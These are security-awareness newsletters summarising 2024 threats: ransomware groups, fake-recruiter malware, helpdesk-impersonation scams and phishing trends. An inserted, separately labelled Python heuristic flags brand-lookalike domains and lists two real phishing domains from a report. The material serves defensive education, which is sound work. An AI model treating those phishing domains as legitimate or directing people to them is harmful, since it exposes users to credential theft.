  • Healthcare is a prime target due to critical operations needing quick recovery. 

Further Reading: Trinity Ransomware Targets Healthcare

Threat Intelligence Update: Black Basta’s Social Engineering Tactics via Microsoft Teams 

The Black Basta ransomware group has employed a sophisticated social engineering campaign targeting organizations through Microsoft Teams. By signing user emails up for multiple spam sources, Black Basta overwhelms the target with unwanted messages. Threat actors then contact the user, impersonating IT support and offering assistance with the email flood. During this call, the attacker convinces the user to install remote access software like Quick Assist or AnyDesk, providing them unauthorized access to the network. Once inside, the attackers can harvest credentials and potentially deploy ransomware. 

Key Insights: 

  • Attackers use a flood of spam emails to distract and stress targets. 

  • Impersonation of IT support builds credibility and increases the chance of remote access. 

  • This tactic highlights the need for training employees to verify unexpected IT requests and avoid downloading unapproved software. 

Further Reading: ReliaQuest Blog on Black Basta's Techniques

Q3 2024 Ransomware Trends 

The ReliaQuest Q3 2024 ransomware report highlights significant shifts in the ransomware landscape, with new groups gaining prominence and using sophisticated tactics to escalate their attacks. RansomHub has overtaken LockBit as the most active group, experiencing an 800% rise in postings from Q1 to Q3. Their growth is attributed to aggressive recruiting and lucrative profit-sharing, which has drawn affiliates from other disrupted groups. This group, along with Play ransomware, continues to exploit vulnerabilities in VPNs and public-facing applications, demonstrating the persistent risk posed by unpatched systems. 

Key Insights: 

  • RansomHub’s Rapid Rise: RansomHub posted 195 times in Q3, an 800% increase from Q1, leveraging a 90/10 profit-sharing model to attract affiliates. 

  • Expansion into ESXi Environments: Play ransomware’s new Linux variant targets VMware ESXi servers, broadening its impact across platforms. 

  • High-Risk Sectors: Professional services, healthcare, and manufacturing sectors are top targets due to potential operational disruptions. 

  • Vulnerability Exploits: Attackers frequently gain access through unpatched VPNs and other internet-facing applications, emphasizing the need for timely patch management. 

Further Reading: ReliaQuest Q3 Ransomware Report

Update: Q3 2024 Brand Phishing Trends 

Check Point Research’s Q3 2024 report reveals that Microsoft continues as the most impersonated brand in phishing attacks, accounting for 61% of brand phishing attempts. Apple (12%) and Google (7%) follow, with new additions Alibaba and Adobe rounding out the top 10. These attacks commonly target the technology, social media, and banking sectors, as cybercriminals exploit brand familiarity to deceive users and capture credentials or payment information. Notably, new phishing sites targeting WhatsApp and Alibaba highlight the evolving strategies of threat actors seeking to exploit user trust. 

Key Insights: 

  • Microsoft Dominance: Microsoft phishing attempts made up 61% of brand impersonation attacks, with Apple and Google also highly targeted. 

  • Sector Focus: Technology and social networks were the most impersonated sectors, followed by banking. 

  • Evolving Phishing Tactics: Phishing websites like whatsapp-io.com and alibabashopvip.com show attackers adapting to impersonate new brands. 

Further Reading: Check Point’s Q3 2024 Brand Phishing Report.

Global Surge in Cyber Attacks in Q3 2024 

Check Point’s Q3 2024 report highlights a significant 75% increase in global cyber attacks compared to last year, with each organization facing an average of 1,876 weekly attacks. Sectors most impacted include Education/Research (3,828 weekly attacks), Government/Military (2,553), and Healthcare (2,434), reflecting the increased focus on these industries. Africa saw the highest regional attack rate, averaging 3,370 weekly, up 90% from 2023, while North America experienced the most ransomware attacks, making up 57% of incidents worldwide. Manufacturing was the top ransomware target, followed by Healthcare and Retail/Wholesale. 

Key Insights: 

  • Attack Growth by Sector: The Hardware Vendor industry had the largest increase in attacks, surging by 191%. 

  • Regional Hotspots: Africa, Latin America, and Europe saw the steepest rises, with Europe experiencing an 86% year-over-year spike. 

  • Ransomware Targets: The Manufacturing sector accounted for 30% of ransomware incidents, underscoring cybercriminals' focus on high-disruption industries. 

Further Reading: Check Point Q3 2024 Report.

North Korean Cybercriminal Infiltrates UK Company 

A UK-based organization recently suffered a breach after inadvertently hiring a North Korean cybercriminal posing as a remote IT worker. Once hired, the attacker used insider access to extract sensitive information and eventually demanded a ransom for its non-disclosure. This case highlights the importance of strict hiring processes for remote roles and enhanced security practices. 

Key Insights: 

  • Vetting Remote Employees: Conduct rigorous background checks to confirm credentials. 

  • Data Security: Monitor access and behavior for early threat detection. 

  • Remote Work Risks: Be mindful of cyber threats exploiting virtual roles. 

Further Reading: KnowBe4 Article; KnowBe4 10 Hiring Updates

Partnership Between Scattered Spider and RansomHub 

ReliaQuest reports a new collaboration between the Scattered Spider and RansomHub groups, merging advanced social engineering skills with network-compromising expertise to target enterprises globally. The partnership leverages RansomHub's effective 90/10 profit-sharing model, attracting experienced threat actors from disrupted groups. This collaboration allows attackers to target critical virtual infrastructures, such as ESXi servers, which host key applications, enabling high-impact ransomware attacks that pressure victims to pay swiftly. 

Key Insights: 

  • Targeting of ESXi Servers: These servers, often running multiple virtual machines, are attractive for ransomware attacks as they disrupt operations across organizations. 

  • Social Engineering Tactics: Scattered Spider's expertise in impersonating IT staff aids in gaining unauthorized access to organizational networks. 

  • Rising Threat of RansomHub: RansomHub has rapidly gained dominance, surpassing groups like LockBit, indicating a strategic shift in ransomware collaborations and effectiveness. 

For more details, explore the full article at ReliaQuest. 

 

 

Social Engineering Exploits Valid Accounts 

Recent incidents highlight how threat actors are compromising legitimate accounts through social engineering tactics. By manipulating individuals into divulging sensitive information or performing specific actions, attackers gain unauthorized access to systems and data. This method often involves impersonating trusted entities or creating convincing scenarios to deceive targets. 

Key Insights: 

  • Impersonation Tactics: Attackers frequently pose as IT support or company executives to extract credentials. 

  • Phishing Campaigns: Sophisticated emails and messages are crafted to appear authentic, luring recipients into providing access details. 

  • Insider Threats: Compromised accounts can be used to launch further attacks within an organization, making detection challenging. 

Further Reading: KnowBe4 Article on Social Engineering Exploits. 

 

 

North Korean Group Adopts Play Ransomware 

Unit 42 has identified that the North Korean state-sponsored threat group, Jumpy Pisces (also known as Andariel), has begun collaborating with the Play ransomware group, Fiddling Scorpius. This marks a significant shift in Jumpy Pisces' tactics, moving from traditional cyber espionage to active participation in ransomware operations. The group gained initial access to networks via compromised user accounts, deploying tools like Sliver and their custom malware, DTrack, to facilitate lateral movement and persistence. This collaboration underscores the evolving ransomware landscape, where nation-state actors are increasingly engaging in financially motivated cybercrime. 

Key Insights: 

  • Tactical Shift: Jumpy Pisces is now utilizing existing ransomware infrastructures, indicating a move towards financial cybercrime. 

  • Advanced Tools: The group employs sophisticated tools such as Sliver and DTrack for network infiltration and persistence. 

  • Global Targeting: Their activities are expected to target a wide range of victims worldwide, necessitating heightened vigilance. 

Further Reading: Unit 42 Article on Jumpy Pisces and Play Ransomware. 

 

 

Key Cyber Threat Actors in 2024 

ReliaQuest's recent analysis identifies five prominent cyber threat actors significantly impacting the cybersecurity landscape in 2024: 

  • RansomHub: Emerging as a dominant ransomware group, RansomHub has surpassed previous leaders like LockBit and ALPHV, posing substantial risks to organizations globally. 

  • IntelBroker: As the acting administrator of BreachForums, IntelBroker oversees activities on one of the largest English-language cybercriminal forums, facilitating various malicious operations. 

  • APT41: A Chinese state-affiliated group, APT41 continues to engage in espionage activities, targeting sectors such as healthcare, telecommunications, and finance. 

  • APT29: Known for its sophisticated espionage campaigns, this Russian state-affiliated group remains active in infiltrating governmental and private sector networks. 

  • KillSec: Originally aligned with the "Anonymous" hacktivist collective, KillSec has recently shifted towards financially motivated ransomware activities, increasing its threat profile. 

Further Reading: ReliaQuest Article on Critical Threat Actors. 

 

Halloween’s Digital Threats of 2024 

Halloween brings tales of horror, but in 2024, some of the scariest threats come from the digital realm. Cybercriminals are increasingly using advanced tools to target individuals and organizations with new forms of AI-driven malware, IoT exploits, and social engineering tricks that play on our trust. 

Key Insights: 

  • AI-Powered Attacks: These cyber “ghosts” can adapt to evade detection, making attacks like spear-phishing and deepfakes more convincing. 

  • IoT Vulnerabilities: Over 20,000 vulnerable IoT devices, including cameras and routers, have become entry points for attackers, posing risks to privacy and security. 

  • Social Media Exploitation: Personal data scraped from social platforms is being weaponized for phishing and blackmail, creating "digital dossiers" for targeted attacks. 

  • Fake Calls and Malware: Scammers posing as bank representatives are using fake calls to steal sensitive information, a trick that’s led to an increase in identity theft and financial loss. 

  • Dating Apps and Location Data: Privacy risks on dating apps, including inadvertent location sharing, are turning digital encounters into real-life safety concerns. 

Further Reading: Check Point’s guide on Halloween Cyber Threats. 

 

In News Tags Newsletter, threat intelligence, phishing

November 2024 Cybersecurity Awareness Newsletter

November 8, 2024

This is a newsletter I share internally as part of our internal security awareness program. Feel free to take and use in your organization. Created with help from ChatGPT.

Fake Job Applications Deliver Dangerous Malware 

Summary: A spear-phishing campaign has been targeting HR professionals with malicious job applications. Attackers use fake resumes containing More_eggs malware, a backdoor designed to steal credentials. This malware, part of a Malware-as-a-Service (MaaS) platform operated by the Golden Chickens group, can be used by multiple threat actors. The attack chain involves malicious Windows shortcut (LNK) files that initiate the infection upon execution, allowing attackers to perform reconnaissance and drop additional payloads. 

Key Insight: Be cautious when handling job applications, especially those involving downloadable files from unknown sources. 

For further details, read the full article on The Hacker News. 

 

 

Data Privacy Risks in Connected Cars 

Modern connected vehicles collect vast amounts of data, including driving habits, location, and even biometric information like voice commands. A recent analysis by CHOICE reveals that many popular car brands share this data with third-party companies, raising privacy concerns. Brands like Kia, Hyundai, and Tesla collect and share voice and video data, while others gather driving behaviors. This highlights the importance of understanding your car’s data collection practices and opting out where possible. 

Further reading: CHOICE - Connected Cars Tracking Your Data. 

 

 

North Korean Hackers Targeting Job Seekers 

A new campaign by North Korean hackers is targeting job seekers, particularly in the tech industry, according to a recent report. Hackers impersonate recruiters on platforms like LinkedIn, luring individuals into downloading malware disguised as video conferencing tools. The malware is designed to steal cryptocurrency and sensitive corporate data, posing risks to both individuals and organizations. Job seekers should remain cautious when interacting with unsolicited offers and recruiters. 

Further reading: KnowBe4 - North Korean Hackers. 

 

 

Election Season and Cybersecurity Concerns 

As the 2024 election season progresses, a recent Malwarebytes survey reveals that 74% of respondents consider it a risky time for personal information. Fears of scams, privacy breaches, and cyber interference are high, with 52% of people expressing concern about falling prey to scams through political ads. Many are taking precautions, such as using two-factor authentication and password managers, to secure their data. 

Key Insights: 

  • 74% view election season as risky for personal data. 

  • 52% fear scams via political ads. 

  • Increased adoption of security practices like two-factor authentication. 

Further reading: Malwarebytes - Election Season Raises Fears. 

 

 

North Korean IT Worker Incident Highlights Hiring Risks 

A recent cyberattack on a company underscores the dangers of unknowingly hiring North Korean operatives. The organization accidentally hired a North Korean IT worker who accessed sensitive data and demanded a ransom. This highlights the need for stringent vetting in remote hiring practices, especially as North Korea increasingly infiltrates global companies. 

Recommended Protections: 

  • Implement strict identity verification for remote workers. 

  • Conduct thorough background checks with global databases. 

  • Regularly monitor employee network activity for unusual behavior. 

Further reading: GBHackers - North Korean IT Worker Incident. 

 

 

Mobile-First Cyber Attacks on the Rise 

Cyber attackers are increasingly adopting a "mobile-first" strategy, as highlighted by a new report from Zimperium. With 83% of phishing sites now targeting mobile devices and a 13% rise in mobile malware, employees’ personal devices pose a growing risk to organizations. As more employees use their smartphones for work-related tasks, organizations need to bolster mobile security and educate employees on safe practices through security awareness training. 

Further reading: KnowBe4 - Mobile-First Attack Strategy. 

 

 

 

Microsoft Spoofing Threats on the Rise 

A recent report from Harmony Email & Collaboration highlights over 5,000 fake Microsoft emails targeting organizations within a single month. These emails, often impersonating legitimate administrators, use sophisticated obfuscation techniques, making it difficult for users to detect. The risks include account takeovers, ransomware, and data theft.  

Further reading: Check Point Blog. 

 

 

New VPN Credential Attack Uses Sophisticated Social Engineering 

A recent attack uncovered by security researchers targets organizations using VPNs through a combination of social engineering, fake login sites, and phone calls. Attackers impersonate a helpdesk, direct users to a spoofed VPN login page, and steal credentials. They also prompt users for multi-factor authentication (MFA) codes to gain access to corporate networks. This attack highlights the importance of user vigilance and strong security training. 

Attack Chain: 

  • Impersonation of helpdesk. 

  • Directs victim to fake VPN login page. 

  • Steals credentials and MFA codes. 

Further reading: KnowBe4 - New VPN Credential Attack. 

 

 

Operation Kaerb Takedown 

Operation Kaerb successfully dismantled iServer, a Phishing-as-a-Service platform responsible for facilitating mobile credential theft targeting nearly half a million victims. iServer enabled low-skilled criminals to unlock stolen phones by phishing for user credentials. This takedown is a reminder of the evolving tactics cybercriminals use and underscores the importance of staying vigilant against mobile-focused phishing attacks. 

Further Reading: Operation Kaerb on KnowBe4 

 

 

Sextortion Scams on the Rise 

Our team has recently been targeted by sextortion scams, where attackers use publicly available information to create threatening messages designed to elicit fear and urgency. These scams often appear more credible by including personal details. If you receive such a message, avoid engagement or payment—report it to our security team immediately by using the suspicious email button in Outlook. 

Further Reading: KnowBe4 Article on Sextortion Scams. 

 

 

Update: Q3 2024 Brand Phishing Trends 

Check Point Research’s Q3 2024 report reveals that Microsoft continues as the most impersonated brand in phishing attacks, accounting for 61% of brand phishing attempts. Apple (12%) and Google (7%) follow, with new additions Alibaba and Adobe rounding out the top 10. These attacks commonly target the technology, social media, and banking sectors, as cybercriminals exploit brand familiarity to deceive users and capture credentials or payment information. Notably, new phishing sites targeting WhatsApp and Alibaba highlight the evolving strategies of threat actors seeking to exploit user trust. 

Key Insights: 

  • Microsoft Dominance: Microsoft phishing attempts made up 61% of brand impersonation attacks, with Apple and Google also highly targeted. 

  • Sector Focus: Technology and social networks were the most impersonated sectors, followed by banking. 

  • Evolving Phishing Tactics: Phishing websites like whatsapp-io.com and alibabashopvip.com show attackers adapting to impersonate new brands. 

Further Reading: Check Point’s Q3 2024 Brand Phishing Report. 
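As an added example (not part of the newsletter or the Check Point report), a small Python heuristic in the spirit of the insight above: it flags hostnames that embed a listed brand name outside that brand's legitimate domains, and is run over the two domains named in the report plus constructed samples. The brand allowlist, suffix list and character-substitution map are constructed for illustration, not authoritative.

```python
"""Lookalike-domain heuristic for brand-impersonation phishing (added example)."""
import re

# Constructed allowlist: registrable domains each brand legitimately uses.
# A real deployment would maintain this from the brands' published domains.
LEGIT_DOMAINS = {
    "microsoft": {"microsoft.com", "live.com", "office.com", "outlook.com"},
    "apple": {"apple.com", "icloud.com"},
    "google": {"google.com", "gmail.com", "youtube.com"},
    "whatsapp": {"whatsapp.com", "whatsapp.net"},
    "alibaba": {"alibaba.com", "aliexpress.com"},
    "adobe": {"adobe.com"},
}

# Constructed suffix list; production code should use the Public Suffix List.
KNOWN_SUFFIXES = ("co.uk", "com.au", "com", "net", "org", "io", "info", "shop", "xyz")


def registrable_domain(host: str) -> str:
    """Return 'label.suffix' for host, handling two-level suffixes like co.uk."""
    labels = host.lower().strip(".").split(".")
    # Try longer suffixes first so 'co.uk' wins over 'uk'.
    for suffix in sorted(KNOWN_SUFFIXES, key=lambda s: -s.count(".")):
        parts = suffix.split(".")
        if labels[-len(parts):] == parts and len(labels) > len(parts):
            return ".".join(labels[-len(parts) - 1:])
    return ".".join(labels[-2:])


def normalize(host: str) -> str:
    """Drop separators and undo common digit-for-letter swaps (constructed map)."""
    subs = {"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t"}
    flat = re.sub(r"[-_.]", "", host.lower())
    return "".join(subs.get(ch, ch) for ch in flat)


def impersonated_brand(host: str):
    """Return the brand a hostname appears to impersonate, or None.

    Heuristic only: a brand string inside an unrelated word (e.g. 'pineapple')
    will also be flagged, so results are triage input for an analyst.
    """
    reg = registrable_domain(host)
    all_legit = set().union(*LEGIT_DOMAINS.values())
    if reg in all_legit:
        return None  # the real brand domain or one of its subdomains
    flat = normalize(host)
    for brand in LEGIT_DOMAINS:
        if brand in flat:
            return brand  # brand name present on a domain the brand does not own
    return None


def triage(hosts):
    """Map each observed hostname to the brand it impersonates (None = not flagged)."""
    return {h: impersonated_brand(h) for h in hosts}


if __name__ == "__main__":
    # Two domains named in the report plus constructed samples.
    sample = ["whatsapp-io.com", "alibabashopvip.com",
              "login.microsoft.com", "m1cr0soft-login.net", "shop.example.co.uk"]
    for host, brand in triage(sample).items():
        print(f"{host:28} -> {brand}")
```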

 

 


North Korean Threat Actors Pose as Recruiters to Target Job Seekers 

Palo Alto Networks' Unit 42 recently uncovered a campaign in which North Korean threat actors pose as recruiters to lure tech job seekers into downloading malware disguised as legitimate communication tools. Known as the "Contagious Interview" campaign, this operation involves malware variants like BeaverTail and InvisibleFerret, which are capable of stealing credentials, exfiltrating sensitive files, and targeting cryptocurrency wallets. Victims are approached on professional platforms like LinkedIn, and then directed to install fake interview applications that serve as a conduit for malware. 

Key Insights: 

  • Sophisticated Impersonation Tactics: Attackers convincingly impersonate recruiters and use realistic job offers to build trust with targets. 

  • Multifunctional Malware: The malware used can harvest browser passwords, access cryptocurrency wallets, and install backdoors, enhancing its threat potential. 

  • Organizational Risk: Beyond individual targets, successful infections on company devices can lead to broader data breaches within organizations. 

As remote work and digital hiring continue to rise, it’s critical to validate the legitimacy of recruiters and avoid downloading unverified software for job interviews. 

Further Reading: Unit 42 Report on North Korean Recruitment Tactics 

 

 

Pig Butchering Scams Target Job Seekers 

Proofpoint has identified a new twist in cryptocurrency fraud, known as "Pig Butchering," targeting job seekers. Scammers posing as recruiters lure victims into fake job roles, eventually guiding them to invest in fraudulent cryptocurrency platforms. Victims see initial "profits" to build trust, but ultimately lose their entire investment. These scams often begin on social media, moving to platforms like WhatsApp or Telegram for further manipulation. 

Further Reading: Proofpoint Article. 

 

 

Foreign Disinformation on U.S. Hurricanes 

Recent intelligence shows that operatives from Russia, China, and Cuba have spread false information about U.S. hurricanes to deepen political divides. AI-generated images and misleading posts claimed federal relief was denied or funds were diverted to foreign conflicts, aiming to erode trust in U.S. disaster response. Be cautious of divisive narratives or unverified disaster images on social media, as they may be part of coordinated disinformation efforts. 

Further Reading: NBC News Article. 

 

 


Major Data Breach at Change Healthcare Affects 100 Million Americans 

In February 2024, Change Healthcare, a leading U.S. healthcare technology company, experienced a significant ransomware attack that compromised the personal, financial, and medical information of approximately 100 million individuals. The breach disrupted healthcare services nationwide, highlighting vulnerabilities in the sector's cybersecurity defenses. 

Key Insights: 

  • Scope of Breach: The attack exposed sensitive data, including medical records, billing information, and personal identifiers such as Social Security numbers and driver's license details. 

  • Financial Impact: UnitedHealth Group, Change Healthcare's parent company, reported direct breach response costs of $1.521 billion and total cyberattack impacts of $2.457 billion. 

  • Ransom Payment: The company paid a $22 million ransom to the BlackCat ransomware group in an attempt to secure the stolen data. 

Further Reading: Change Healthcare Breach Hits 100M Americans – Krebs on Security 

 

 

Student Loan Phishing Scams Targeting Millions 

Cybercriminals are exploiting confusion around student loan forgiveness with a surge in phishing emails targeting millions of Americans. These emails use advanced techniques to look legitimate and bypass email filters, making them harder to detect. 

What You Can Do to Stay Safe: 

  • Watch for Red Flags: Be cautious with emails related to student loans, especially those asking for immediate action or personal information. Verify any claims by contacting your loan service provider directly. 

  • Check the Source: Always look closely at the sender’s email address. Official communication will come from verified addresses, not random or suspicious-looking senders. 

  • Enable Multi-Factor Authentication (MFA): Use MFA on your financial accounts for extra security, making it harder for attackers to gain access if they obtain your credentials. 

  • Be Prepared: Know how to report a suspicious email in your email system, and don’t hesitate to delete anything that seems off. 

Further Reading: Check Point Blog. 

In News Tags Newsletter, Security Awareness